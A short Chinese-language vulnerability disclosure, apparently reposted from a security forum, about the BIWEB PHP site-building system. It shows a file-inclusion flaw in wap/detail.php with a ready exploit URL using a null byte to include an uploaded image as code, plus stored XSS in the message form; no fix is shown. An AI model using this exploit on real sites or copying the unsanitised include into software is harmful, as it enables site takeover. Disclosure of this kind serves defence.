BIWEB PHP 开源企业建站 系统 (bug修正版),
BIWEB 门户网站PHP开源建站系统,
BIWEB 商城系统PHP开源建站系统.
1.通杀的包含
/wap/detail.php,X,X...
$objWebInit = new wap(); if (empty($_GET['page'])) {
$intPage = 1 ;
} else {
$intPage = intval($_GET['page']);
}
if (empty($_GET['cpage'])) {
$intCPage = 1 ;
} else {
$intCPage = intval($_GET['cpage']);
}
if (!empty($_GET['mod'])) {
$strModuleID = strval($_GET['mod']);
include_once(''.$strModuleID.'/config/var.inc.php');
$objWebInit->setDBG($arrGPdoDB);
$objWebInit->db();
exp:
http://www.2cto.com /biwebcorp/wap/list.php?mod=uploadfile/201112/20111218025615648.jpg%00
2.
PHP开源企业建站系统(bug修正版)XSS
message\include\index.inc.php
if ($_SERVER["REQUEST_METHOD"] == "POST"){
if(empty($_POST['contact'])) check::AlertExit('对不起,姓名必须填写!',-1);
if(empty($_POST['tel'])) check::AlertExit('对不起,联系电话必须填写!',-1);
.......
$strIP = check::getip();
$_POST['user_ip'] = $strIP;
$objWebInit->saveInfo($_POST,0); saveInfo function
function saveInfo($arrData,$intModify=0){
$arr = array();
$arr = check::SqlInjection($this->saveTableFieldG($arrData));
.......
} SqlInjection function
static function SqlInjection($ParamValue,$enforce=false){
if (!get_magic_quotes_gpc() || $enforce){
if (is_array($ParamValue)){
foreach ($ParamValue as $key=>$value){
$ParamValue[$key] = addslashes($value);
}
}else{
$ParamValue = addslashes($ParamValue);
}
}
return $ParamValue;
} 门户网站PHP开源建站系统xss 一大坨..
转自:http://t00ls.net/viewthread.php?tid=19830&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000
查看更多关于BIWEB bug及修复 - 网站安全 - 自学php的详细内容...